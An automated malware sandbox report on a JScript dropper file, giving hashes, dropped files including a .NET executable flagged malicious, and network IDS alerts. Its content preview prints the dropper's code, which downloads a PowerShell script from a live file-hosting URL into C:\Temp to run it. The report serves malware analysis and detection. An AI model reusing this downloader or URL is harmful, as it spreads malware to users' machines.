                                                                                                MD5:F442CD24937ABD508058EA44FD91378E
                                                                                                SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                                                                                SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                                                                                SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........
                                                                                                Process:C:\Windows\SysWOW64\sxstrace.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):794112
                                                                                                Entropy (8bit):4.180109606451475
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:/JBrL3YbaT7rqT4wSYivW10sITenxn5euchajy2JhwwO5CLCaC/VpBsZOPExz5dH:3rt6Z4Cx5esOpY23X
                                                                                                MD5:A8E663A472E2702B7446D20CCE906A18
                                                                                                SHA1:AD736A55317BFCA67AE2C9CD2191A3646ADE69FB
                                                                                                SHA-256:CB4A31EC615392F5F6F50F29944D33FA01890C53B854CE8CBEC5C021ABF98DAB
                                                                                                SHA-512:7BA41481B662C0FEDDD7E8FB2D7B3528013208B4A9B993B9DFCAB373B8FC9ECFA81FF5B890ACDA3A741AD30DD5A26B31E032CE2C83D303F747F22AC69524A770
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;...............0.............N3... ...@....@.. ....................................`..................................2..O....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................03......H.......XG...............F................................................(R...*.0..m........ z7W. ;. .a%...^E........B...j.......L...............W.......#...8e....(..... ....Z :...a+..$...(....r...p.. ...%..&...(.....o..... d-..8x.... ( ..8m...r/..p........%.r3..p.o....o....,. ....%+. ..S.%&. ..q.Za80...8..... z;8.Z ....a8.....$...(....r...p.. ...%..&...(.....o...... .pk.Z .b.ca8.... .]$. ....a%..^E....c...................{........... .g..8.....-. ....%+. ...%&. ..r.Za8....
                                                                                                File type:ASCII text, with CRLF line terminators
                                                                                                Entropy (8bit):4.868264905457651
                                                                                                TrID:
                                                                                                • Digital Micrograph Script (4001/1) 100.00%
                                                                                                File name:11001_10032.jse
                                                                                                File size:2'245 bytes
                                                                                                MD5:7d9d9bf2e53af7456d06ff9397e742ee
                                                                                                SHA1:e65297914a9e89bd693c332c4e38d18089d30ef1
                                                                                                SHA256:0c073edae8314eb90ac4d7ee3c46428a22eb787f12df3ce0465f4cb924ed05c6
                                                                                                SHA512:2628a643c5a397ab19f8574c0fdfc1ca1c66ac8b7934623bfde04a2b2f9eaeabe0cb4ecb668c9934b6baae1051630498f533f0541a640f01badf9526f31bf3b9
                                                                                                SSDEEP:48:40t0xdxQ/Mjj1JWgNOYZDycnhNJtjzj7Diz:T0x7Q4ZYgNn+mDiz
                                                                                                TLSH:4741FE6F9E4AD332423A2B0A851AD405EB4A41679601C211FC9CC588BF345A8CDF5BDF
                                                                                                File Content Preview:// Constants (with meaningful names for better readability)..var downloadUrl = "https://files.catbox.moe/p53ou1.ps1";..var scriptPath = "C:\\Temp\\dddddd.ps1";..var folderPath = "C:\\Temp";..var httpSuccessCode = 200;..var powershellCommand = "PowerShell
                                                                                                Icon Hash:68d69b8bb6aa9a86
                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2025-01-21T13:18:56.939087+01002827578ETPRO MALWARE Likely Dropper Doc GET to .moe TLD1192.168.2.449731108.181.20.35443TCP
                                                                                                2025-01-21T13:18:57.030255+01002018856ET MALWARE Windows executable base64 encoded1108.181.20.35443192.168.2.449731TCP